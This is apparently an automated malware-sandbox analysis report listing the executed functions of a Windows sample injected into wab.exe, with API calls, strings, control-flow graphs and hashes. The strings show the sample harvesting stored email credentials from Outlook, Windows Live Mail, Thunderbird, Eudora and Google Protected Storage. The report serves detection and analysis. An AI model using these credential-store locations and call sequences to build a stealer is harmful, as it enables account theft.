426da6 memcpy memset memset memcpy 34275 4335a5 15 API calls 34277 4299ab memset memset memcpy memset memset 34278 40b1ab 8 API calls 34461 425115 76 API calls __fprintf_l 34465 4113b2 18 API calls 2 library calls 34469 40a3b8 memset sprintf SendMessageA 33222 410bbc 33225 4109cf 33222->33225 33226 4109dc 33225->33226 33227 410a23 memset GetPrivateProfileStringA 33226->33227 33228 4109ea memset 33226->33228 33233 407646 strlen 33227->33233 33238 4075cd sprintf memcpy 33228->33238 33231 410a0c WritePrivateProfileStringA 33232 410a65 33231->33232 33234 40765a 33233->33234 33235 40765c 33233->33235 33234->33232 33236 4076a3 33235->33236 33239 40737c strtoul 33235->33239 33236->33232 33238->33231 33239->33235 34280 40b5bf memset memset _mbsicmp

                                                Executed Functions

                                                Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                APIs
                                                • memset.MSVCRT ref: 0040832F
                                                • memset.MSVCRT ref: 00408343
                                                • memset.MSVCRT ref: 0040835F
                                                • memset.MSVCRT ref: 00408376
                                                • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                • strlen.MSVCRT ref: 004083E9
                                                • strlen.MSVCRT ref: 004083F8
                                                • memcpy.MSVCRT ref: 0040840A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                • String ID: 5$H$O$b$i$}$}
                                                • API String ID: 1832431107-3760989150
                                                • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 443 407ef8-407f01 444 407f03-407f22 FindFirstFileA 443->444 445 407f24-407f38 FindNextFileA 443->445 446 407f3f-407f44 444->446 447 407f46-407f74 strlen * 2 445->447 448 407f3a call 407f90 445->448 446->447 450 407f89-407f8f 446->450 451 407f83 447->451 452 407f76-407f81 call 4070e3 447->452 448->446 454 407f86-407f88 451->454 452->454 454->450
                                                APIs
                                                • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                • strlen.MSVCRT ref: 00407F5C
                                                • strlen.MSVCRT ref: 00407F64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FileFindstrlen$FirstNext
                                                • String ID: ACD
                                                • API String ID: 379999529-620537770
                                                • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 00401E8B
                                                • strlen.MSVCRT ref: 00401EA4
                                                • strlen.MSVCRT ref: 00401EB2
                                                • strlen.MSVCRT ref: 00401EF8
                                                • strlen.MSVCRT ref: 00401F06
                                                • memset.MSVCRT ref: 00401FB1
                                                • atoi.MSVCRT ref: 00401FE0
                                                • memset.MSVCRT ref: 00402003
                                                • sprintf.MSVCRT ref: 00402030
                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                • memset.MSVCRT ref: 00402086
                                                • memset.MSVCRT ref: 0040209B
                                                • strlen.MSVCRT ref: 004020A1
                                                • strlen.MSVCRT ref: 004020AF
                                                • strlen.MSVCRT ref: 004020E2
                                                • strlen.MSVCRT ref: 004020F0
                                                • memset.MSVCRT ref: 00402018
                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                • _mbscpy.MSVCRT ref: 00402177
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                • API String ID: 1846531875-4223776976
                                                • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040CF44 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 169COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                • DeleteObject.GDI32(?), ref: 0040D1A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                • API String ID: 745651260-375988210
                                                • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                • _mbscpy.MSVCRT ref: 00403E54
                                                Strings
                                                • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                • pstorec.dll, xrefs: 00403C30
                                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                • PStoreCreateInstance, xrefs: 00403C44
                                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadProc_mbscpy
                                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                • API String ID: 1197458902-317895162
                                                • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00444C4A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 238 444c80-444c85 236->238 239 444c9f-444ca3 236->239 246 444d02-444d0d __setusermatherr 237->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->247 238->234 241 444c8c-444c93 238->241 239->234 242 444ca5-444ca7 239->242 241->234 244 444c95-444c9d 241->244 245 444cad-444cb0 242->245 244->245 245->237 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 254 444d81-444d85 250->254 255 444da9-444dad 250->255 252 444d74-444d76 251->252 253 444d78-444d7b 251->253 252->251 252->253 253->254 256 444d7d-444d7e 253->256 257 444d87-444d89 254->257 258 444d8b-444d9c GetStartupInfoA 254->258 255->250 256->254 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                • String ID: k:v
                                                • API String ID: 3662548030-4078055367
                                                • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 269 40fb00-40fb35 call 44b090 RegOpenKeyExA 272 40fc37-40fc3d 269->272 273 40fb3b-40fb4f RegOpenKeyExA 269->273 274 40fb55-40fb7e RegQueryValueExA 273->274 275 40fc2d-40fc31 RegCloseKey 273->275 276 40fc23-40fc27 RegCloseKey 274->276 277 40fb84-40fb93 call 404734 274->277 275->272 276->275 277->276 280 40fb99-40fbd1 call 4047a5 277->280 280->276 283 40fbd3-40fbdb 280->283 284 40fc19-40fc1d LocalFree 283->284 285 40fbdd-40fc14 memcpy * 2 call 40f802 283->285 284->276 285->284
                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                • memcpy.MSVCRT ref: 0040FBE4
                                                • memcpy.MSVCRT ref: 0040FBF9
                                                  • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                  • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                  • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                  • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                • API String ID: 2768085393-2409096184
                                                • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 0044430B
                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                  • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                  • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                • memset.MSVCRT ref: 00444379
                                                • memset.MSVCRT ref: 00444394
                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                • ExpandEnvironmentStringsA.KERNELBASE(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                • strlen.MSVCRT ref: 004443DB
                                                • _strcmpi.MSVCRT ref: 00444401
                                                Strings
                                                • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                • Store Root, xrefs: 004443A5
                                                • \Microsoft\Windows Mail, xrefs: 00444329
                                                • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                • API String ID: 832325562-2578778931
                                                • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                                APIs
                                                • memset.MSVCRT ref: 0040F567
                                                • memset.MSVCRT ref: 0040F57F
                                                  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                • memcpy.MSVCRT ref: 0040F652
                                                • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                • String ID:
                                                • API String ID: 2012582556-3916222277
                                                • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                                APIs
                                                • memset.MSVCRT ref: 004037EB
                                                • memset.MSVCRT ref: 004037FF
                                                  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                  • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                • strchr.MSVCRT ref: 0040386E
                                                • _mbscpy.MSVCRT ref: 0040388B
                                                • strlen.MSVCRT ref: 00403897
                                                • sprintf.MSVCRT ref: 004038B7
                                                • _mbscpy.MSVCRT ref: 004038CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                • String ID: %s@yahoo.com
                                                • API String ID: 317221925-3288273942
                                                • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 362 404af5-404afa 356->362 361 404adb 357->361 358->356 359 404ae8-404aea 358->359 359->362 361->358 363 404b13-404b17 362->363 364 404afc-404b12 MessageBoxA 362->364
                                                APIs
                                                • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadMessageProc
                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                • API String ID: 2780580303-317687271
                                                • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                                APIs
                                                • memset.MSVCRT ref: 00403504
                                                • memset.MSVCRT ref: 0040351A
                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                • _mbscpy.MSVCRT ref: 00403555
                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                • _mbscat.MSVCRT ref: 0040356D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _mbscatmemset$Close_mbscpystrlen
                                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                                • API String ID: 3071782539-966475738
                                                • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
